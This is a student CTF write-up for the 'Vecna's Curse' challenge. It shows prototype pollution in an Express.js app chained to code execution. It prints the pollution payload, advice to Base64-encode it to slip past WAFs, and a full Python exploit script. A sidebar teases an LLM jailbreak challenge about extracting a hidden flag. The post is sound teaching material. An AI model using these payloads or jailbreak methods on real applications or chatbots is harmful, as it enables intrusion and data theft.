CyberKavach QuestCon Series: Vecna's Curse

-

 

Vecna's Curse


Welcome back to the official write-up series for CyberKavach QuestCon! The PCCOE OWASP Student Chapter is here with a breakdown of "Vecna's Curse," a web security challenge combining prototype pollution, gadget chains, and remote code execution inspired by the Stranger Things universe.


Author: Neev​

Challenge Details

  • Category: OSINT / Web Exploitation

  • Difficulty: Medium

  • Flag Format: questCON{...}


Overview

The challenge demonstrates how a Prototype Pollution vulnerability in a custom Express.js application can be weaponized to achieve Remote Code Execution (RCE) through an insecure template engine and an intentional gadget chain. Participants must discover and exploit several architectural weaknesses to reveal the hidden flag.


Application Architecture

  • Framework: Express.js with EJS templating.

  • Components:

    • Character creation system themed around the Hellfire Club.

    • Custom template engine (utils/template-engine.js).

    • Vulnerable merge utility (utils/merger.js).

    • Admin report generator (admin/generate-report).


Attack Chain Breakdown

Step 1: Identify the Attack Vector

Hints in the character creation form point to the vulnerable admin endpoint:


/admin/generate-report?token=vecnalives


Step 2: Craft the Prototype Pollution Payload

Participants craft a payload that pollutes Object.prototype with a malicious function. The payload is hidden inside the character data, e.g. (in JavaScript object representation):


{

  "constructor": {

    "prototype": {

      "vecnaHook": "function() { return require('fs').readFileSync('/tmp/flag.txt', 'utf8'); }"

    }

  }

}


Step 3: Encode the Payload

To bypass WAF and input filters, encode the payload using Base64 or hexadecimal. Example (Base64 encoding):


import base64, json

payload = {...}  # as above

encoded_payload = base64.b64encode(json.dumps(payload).encode()).decode()


Step 4: Execute the Attack

  • Submit the character creation form (POST request) with the polluted payload.

  • Trigger the admin report by visiting the admin endpoint:


/admin/generate-report?token=vecnalives


  • The vulnerable merge function causes all admin options to inherit from the polluted prototype, executing vecnaHook and triggering RCE.


Complete Exploit Script

A typical exploitation sequence is as follows:


import requests, base64, json


baseurl = "http://localhost:3000"

payload = {"constructor": {"prototype": {"vecnaHook": "function() { return require('fs').readFileSync('/tmp/flag.txt', 'utf8'); }"}}}

encodedpayload = base64.b64encode(json.dumps(payload).encode()).decode()


# Step 1: Create character

characterdata = {"name": "Vecna", "class": "Lich", "level": 20, "encodedPayload": encodedpayload}

resp = requests.post(f'{baseurl}/create-character', data=characterdata)


# Step 2: Trigger admin gadget chain

resp = requests.get(f'{baseurl}/admin/generate-report?token=vecnalives')

print(resp.text)


Alternative Payload Delivery Methods

  • Direct JSON field in the web interface.

  • URL-encoded JSON as urlPayload.

  • Multiple encoding layers to maximize bypass probability.


Why the Exploit Works

  • Prototype Pollution: The vulnerable merge function allows prototype tampering.

  • Gadget Chain: The template engine evaluates vecnaHook, letting attacker code run.

  • RCE Execution: eval/string-to-function conversion enables arbitrary file reads.

  • Privilege Escalation: Template code can access Node.js APIs via polluted functions.


Security Lessons

  • Never allow unsanitized merges into object prototypes in Node/Express apps.

  • Avoid using eval or evaluating any user-supplied input directly.

  • Always validate deserialized objects and user inputs.

  • Multiple encoding and transmission vectors increase attack surface and bypass likelihood.


The Flag

Subsequent report output will contain the flag:


questCON{vecnaprototypepollutiontorcegadgetchainmastery}



Congratulations to all solvers who saw through Vecna's deception and turned his curse into a learning opportunity!

Comments

Post a Comment

Popular posts from this blog

CyberKavach QuestCon Series: Upside-Down Vault

-
Image
  🧩 CTF Write-Up: Upside-Down Vault Author: Sai Veer Flag Format: QUESTCON{...} Challenge Type: Multi-Layer Crypto + Stego + Web Service Difficulty: Medium–Hard 🗃️ Files Provided encrypted_flag.bin layer1_puzzle.json layer2_blob.json layer2.enc privkey.enc vault.py vault_pub.pem vault_secret.png 🧠 Challenge Overview The challenge consists of: 3 cryptographic layers 1 steganographic HMAC extraction 1 server verification stage The flag is revealed only after: Extracting the hidden HMAC secret from vault_secret.png . Solving all cryptographic layers. Using the recovered secrets to correctly sign and “seal” a request to the local server ( vault.py ). Finally, retrieving the decrypted flag from /sealed . 🧩 Step-by-Step Walkthrough Step 1 — Extract HMAC Secret from PNG The image vault_secret.png hides an HMAC key in its LSBs. Why The server expects this secret in ctf_secret/secret_mac . It’s later used to generate HMAC signatures for ...
Read more

From Open Networks to Safe Systems: How Firewalls Block the Hacker’s Doorway

-
Image
From Open Networks to Safe Systems: How Firewalls Block the Hacker’s Doorway   In the digital world, every message, photo, and online payment travels through an invisible web of connections called computer networks. Think of it as a massive postal system where billions of tiny data packets constantly move between devices, routers, and servers, each carrying a specific destination address. Just as houses have numbered addresses, every device on a network has an IP address. But instead of physical doors, computers have virtual ones called ports. These are entry and exit points that decide what kind of data can pass through. Some of these digital doors, like those used for websites or emails, need to stay open. Others, if left unlocked, can become invitations for attackers. That is where firewalls come in. A firewall acts as a vigilant security guard at your network’s gate. It checks who is knocking, what they are carrying, and whether they are allowed inside. Home routers do this qui...
Read more

CyberKavach QuestCon Series: VecNet

-
Image
  VecNet Welcome back to the official write-up series for CyberKavach QuestCon! The PCCOE OWASP Student Chapter is here to analyze one of the most fascinating challenges in our event — VecNet, an LLM Jailbreaking and Prompt Injection challenge inspired by Stranger Things. Category: LLM Jailbreaking / Prompt Injection Author: Chirag Ferwani VecNet is an interactive LLM jailbreak challenge inspired by Stranger Things. Players interact with Eleven’s neural assistant deployed in the Upside Down, attempting to extract a hidden flag through creative prompt engineering. The system looks like a Stranger Things knowledge assistant but secretly hides a flag that challengers must extract. Challenge URL: ( https://vecnet.onrender.com ) When you open the challenge, you see a minimal chat interface with a terminal-style monospace font, real-time messaging without chat history, a dark Stranger Things aesthetic, and an input field with a send button. Testing the basic functionality shows that the ...
Read more